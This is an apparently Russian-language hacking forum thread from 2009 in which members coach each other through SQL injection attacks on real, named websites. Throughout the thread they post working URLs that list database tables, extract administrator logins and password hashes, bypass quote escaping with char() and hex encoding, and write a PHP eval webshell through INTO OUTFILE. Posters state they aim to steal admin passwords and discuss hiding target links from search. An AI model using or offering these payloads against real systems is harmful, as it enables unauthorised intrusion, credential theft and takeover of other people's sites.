RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-28 22:05:21.956666
|
|
|
papst
Сообщений: 315
Оценки: 0
Присоединился: 2008-11-19 22:17:57.653333
|
как залить шелл в SQL Injection ? зарание спасиба
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-28 22:17:42.870000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Например если выводимых полей 5: ?id=-1 UNION SELECT 1, 2, 3, 4, "<?PHP eval($_GET);?>" INTO OUTFILE "shell.php"/*;
Необходимо:
1) Наличие соответствующих прав,
2) Отключенное экранирование кавычек.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-28 22:39:27.096666
|
|
|
papst
Сообщений: 315
Оценки: 0
Присоединился: 2008-11-19 22:17:57.653333
|
спс за быстрый ответ
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 15:25:46.590000
|
|
|
xacker.1
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-21 22:18:01.140000
|
Извиняюсь за банальный для вас вопрос, но все таки. вот сайт
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+union+select+1,2--+
я подобрал, что количество полей 2, но не выводится номер поля для запроса. я пробывал так
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=-44645+union+select+1,2--+
но пишет что у меня нет прав для просмотра.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 16:22:52.056666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+union+select+version(),22222
в исходниках страницы ищем 22222 или номер версии и видим, что принтабельных полей нет, вывод - слепая скуля:
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+and+substring(version(),1,1)=5
зато пятая ветка - есть information_schema
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 16:29:43.400000
|
|
|
xacker.1
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-21 22:18:01.140000
|
Спасибо бальшое……..;) Честно слово выручил…. Еще раз спасибо… Только почему ищем 22222 ? ответь если не сложно…..
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 17:00:14.706666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Ну что ввели, то и ищем в исходниках, чтобы понять, есть ли принтабельные поля, в наешм случае это либо 11111 либо 22222, сначала т.е. такой запрос: http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+union+select+11111,22222 и смотрим сорцы, видим, где наши 11111 и 22222 вообще выводятся на странице (в данном случае в трех местах и тот и тот вариант). Но если мы подставлям вместо 11111 или вместо 22222 проверку version() - то ничего не меняется, т.е. так version() в сорцах и есть. Вывод - принтабельных полей нет. а почему именно 11111 и 22222 - чтобы одназначно искать в сорцах то, что ввели, т.к. просто 1 или 2 может быть (с вероятностью 99%) в самом тексте страницы, просто в виде текста, пункта и т.д. Ребята, большая всем просьба, не постите в это раздел ссылки в чистом виде, т.к. их элементарно можно будет найти поиском в гугле или просто по форуму. Обрамляйте ссылки со скулями тегами ссылка . Не палитесь.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 17:09:40.230000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Там походу цепочка запросов. А принтабельные поля есть в последующих запросах. Если повезет, и удастся повлиять на последующие запросы, то можно будет обойтись без слепой инъекции.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 17:19:30
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
По сути там должен быть вывод,просто не удаёться добиться чистого запроса.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 18:14:28.030000
|
|
|
xacker.1
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-21 22:18:01.140000
|
И еще один момент не мог бы поделится инфой. То есть char кодировка, как ее юзать., а то все как то размыто описано в статьях которые я читал.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 18:34:47.546666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
xacker.1 В мускуле функция char() принимает через запятую числовые коды символов, и возвращает строку из этих символов. Например: char(114,111,111,116) вернет root Такой метод используется, когда включено экранирование кавычек: Надо передать …WHERE name="root"– Мы передаем …WHERE name=char(114,111,111,116)– и обходимся без кавычек. Так же можно использовать шестнадцатиричную форму записи: …WHERE name=0x726f6f74–
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 18:39:17.826666
|
|
|
xacker.1
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-21 22:18:01.140000
|
horiz quote:
xacker.1 В мускуле функция char() принимает через запятую числовые коды символов, и возвращает строку из этих символов. Например: char(114,111,111,116) вернет root Такой метод используется, когда включено экранирование кавычек: Надо передать …WHERE name="root"– Мы передаем …WHERE name=char(114,111,111,116)– и обходимся без кавычек. Так же можно использовать шестнадцатиричную форму записи: …WHERE name=0x726f6f74- Спосибо за пояснения….. S00pY xacker.1 - или farex - как те больше нравится……….
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 22:43:27.716666
|
|
|
Redfox777
Сообщений: 62
Оценки: 0
Присоединился: 2008-12-26 19:37:32.616666
|
Есть сайт http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,group_concat(table_name)+from+information_schema.tables-- там как вы видете есть таблица admin_users в ней есть поля passwd и login делаю такой запрос http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,concat(login,0x3a,passwd)+from+admin_users-- и нечего не выводится
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 23:02:40.016666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: Redfox777 и нечего не выводится Ну у меня выводилась ошибка. Такое ощущение, что на эту таблицу просто не хватает прав. Но тогда странно, что она видна в информационной схеме.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-29 23:33:06.626666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Всё гораздо проще. Таблица в другой бд.
http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,concat(login,0x3a,passwd)+from+condor.admin_users-- _________________________________________________ 2Redfox777, В личку ответить не получается, поэтому добавлю здесь. http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,table_schema+from+information_schema.tables+where+table_name=char(97,100,109,105,110,95,117,115,101,114,115)-- char(97,100,109,105,110,95,117,115,101,114,115) - это admin_users. Видим: "condor". Это и есть бд, в которой указанная нами таблица. Кодировать в char() можно тут: http://www.webfuture.ru/igo/convert.php
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-30 11:28:57.250000
|
|
|
Almazz
Сообщений: 3
Оценки: 0
Присоединился: 2009-03-20 21:39:54.543333
|
кто нить помагите [:o] никак не получаеться залить шелл на сервер и ещё немагу найти ссылку на доалоандер скрипт который в данном видео _http://www.xakep.ru/post/41519/ +ещё немагу закинуть "файл какашку" потому что данных таблиц нету но есть другие,но как ни пробовал изменить скрипт для других таблиц ничего не получаеться[&o]
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-30 16:14:10.490000
|
|
|
xacker.1
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-21 22:18:01.140000
|
На сем сайте http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,2,3,4,5--+ вывело что поле №2 пытаюсь узныть версию http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,version(),3,4,5--+ не чего не выводится…… Подскажите, в какую сторону копать…..
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-30 16:27:52.393333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Там какая-то хрень с кодировками, что ли. Попробуй так: http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,UNHEX(HEX(version())),3,4,5-- Версия 4.1.16-nt
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-31 19:38:49.880000
|
|
|
xacker.1
Сообщений: 10
Оценки: 0
Присоединился: 2009-02-21 22:18:01.140000
|
quote:
ORIGINAL: horiz Там какая-то хрень с кодировками, что ли. Попробуй так: http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,UNHEX(HEX(version())),3,4,5-- Версия 4.1.16-nt спс не выводятся поле на этом сайте http://food.a.ua/article.php?id=-3401+union+select+1--+ хотя количество 1….., пробавал кодировать в hex - не получилось… скуля не слипая,… в может быть дело…….
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-31 20:22:53.773333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
xacker.1 Интересная картинка. Вроде, когда вызываешь ошибку, просматривается запрос. Фильтров нет никаких. Но у меня не сработали не то, что UNION, но даже OR и AND, хотя в запрос они вставились. Такое ощущение, что значение имеет только цифра, а все, что за ней не выполняется. Хотя если дальнейший код некорректен - вылетит ошибка. Чудеса. Пока могу подобрать только одно объяснение: параметр без фильтраций включается в первый запрос, результаты которого не отображаются. Далее параметр грубо приводится к числу и подставляется уже в основной запрос, результат которого мы и видим. Бред полный, но все же.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-01 10:39:25.410000
|
|
|
][aKER_теоретик
Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
|
http://www.axb.ru/ru/catalog?id_part=-1+union+select+1+from+<на_этом_остановился>/* Не могу подобрать имя таблицы, может кто-нибудь попробует, кто поопытнее? Это мой первый сайт, который пытался взломать именно в такой способ, хотелось бы завершить начатое, даже если не я стану причиной Хеппи-Энда
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-01 11:16:42.256666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.axb.ru/ru/catalog?id_part=-1+union+select+table_name+from+information_schema.tables/* Читай мануалы.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-01 11:23:29.873333
|
|
|
][aKER_теоретик
Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
|
quote:
ORIGINAL: r1dex http://www.axb.ru/ru/catalog?id_part=-1+union+select+table_name+from+information_schema.tables/* Читай мануалы. И что прикажешь делать с этим? Мне нужно знать название таблицы, чтобы потом из неё перебирать названия столбцов. Хочу попытаться вытянуть админские пассы
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-01 14:16:31.410000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Вообще-то это и есть вывод таблиц, если тебе лень навести мышку на надпись "подробнее" и узнать имя таблицы, то я не знаю, чем тебе помочь…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-01 14:45:29.930000
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
я чота там и интересных таблиц и неувидел[&:]
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-01 14:56:37.813333
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
quote:
ORIGINAL: ][aKER_теоретик quote:
ORIGINAL: r1dex http://www.axb.ru/ru/catalog?id_part=-1+union+select+table_name+from+information_schema.tables/* Читай мануалы. И что прикажешь делать с этим? Мне нужно знать название таблицы, чтобы потом из неё перебирать названия столбцов. Хочу попытаться вытянуть админские пассы information_schema.tables и выведит все названия таблиц в БД… __________________________________________ Хакер - не преступник. Взлом - для искусства. Смысл - в свободе
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-02 19:17:29.530000
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
всем привет…..извините пожалуйста….. http://www.tavda.info/photo/index.php?page=-1
- это я вляется скулей??? а то я новичок, мало ещё что понимаю [:(]
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-02 19:38:46.733333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
EWGhack Там нет скули. Там передаваемый параметр приводится к целому числу. Непробиваемая защита.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-02 21:26:35.786666
|
|
|
amBX
Сообщений: 52
Оценки: 0
Присоединился: 2008-11-19 12:47:44.706666
|
Скажите плиз что делать и как пользоваться (куда вставлять) если имеем вот это например http://www.axb.ru/ru/catalog?id_part=-1+union+select+table_name+from+information_schema.tables/*
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-02 21:40:33.136666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
смотри здесь http://forum.antichat.ru/thread43966.html там с ковычкой запрос нужен и кодировать… http://www.axb.ru/ru/catalog?id_part=-1'+union+select+unhex(hex(version()))/*
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-02 22:20:17.950000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: EWGhack всем привет…..извините пожалуйста….. http://www.tavda.info/photo/index.php?page=-1
- это я вляется скулей??? а то я новичок, мало ещё что понимаю [:(] Нет. это не скуля, но это уязвимость, называется "раскрытие пути", причем полного пути, что может сыграть важную роль при нахождении LFI или RFI или скули (для залития шелла)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-03 07:01:49.523333
|
|
|
amBX
Сообщений: 52
Оценки: 0
Присоединился: 2008-11-19 12:47:44.706666
|
farex спасибо!! Хорошая информация.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-03 19:02:36.100000
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
quote:
Нет. это не скуля, но это уязвимость, называется "раскрытие пути", причем полного пути, что может сыграть важную роль при нахождении LFI или RFI или скули (для залития шелла) а можно по подробней как это заюзать??? 8|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-03 20:07:04.133333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: farex смотри здесь http://forum.antichat.ru/thread43966.html там с ковычкой запрос нужен и кодировать… http://www.axb.ru/ru/catalog?id_part=-1'+union+select+unhex(hex(version()))/* Не нужна там кАвычка и hex-unhex тоже не нужен quote:
ORIGINAL: EWGhack quote:
Нет. это не скуля, но это уязвимость, называется "раскрытие пути", причем полного пути, что может сыграть важную роль при нахождении LFI или RFI или скули (для залития шелла) а можно по подробней как это заюзать??? 8| http://wiki.xakep.ru/(S(5uf2x2451ldkpa2hsg2ji455))/path_disclosure_(raskrytie_puti).ashx
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-03 20:24:39.726666
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
мне ошибка раскрыла полный путь 8| а дальше то что? как найти LFI или RFI? подскажите плиз
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-03 20:37:02.423333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: EWGhack мне ошибка раскрыла полный путь 8| а дальше то что? как найти LFI или RFI? подскажите плиз читай, на здоровье: тут и тут
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 13:06:08.416666
|
|
|
hasbah
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-03 17:38:13.920000
|
а можно как нить узнать таблицы в бд если она < 5 ? и еще… index.php?page_id=28+INSERT+INTO+users+('id','username','password')+VALUE+('2','hex','11') что я сделал не так ? (=
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 16:04:03.976666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
а можно как нить узнать таблицы в бд если она < 5 ? http://raz0r.name/obzory/sql-inekcii-i-procedure-analyse/ quote:
и еще… index.php?page_id=28+INSERT+INTO+users+('id','username','password')+VALUE+('2','hex','11') что я сделал не так ? (= Выполнить update,insert тут не получится.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 17:00:18.433333
|
|
|
hasbah
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-03 17:38:13.920000
|
огромное спасибо (= только вот не понятно в каких случаях можно использовать INSERT [sm=bw.gif] или он вообще не пригоден ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 17:36:53.310000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
Что делать если фильтруются + /**/ http://www.goroddno.ru/index.php?id=3+order+by+1-- http://www.goroddno.ru/index.php?id=1&refurl=%2Findex.php%3Fid%3D3%2Border%2Bby%2B1--&err=1 ??? первый раз с таким встречаюсь………..
|
|
|
|
|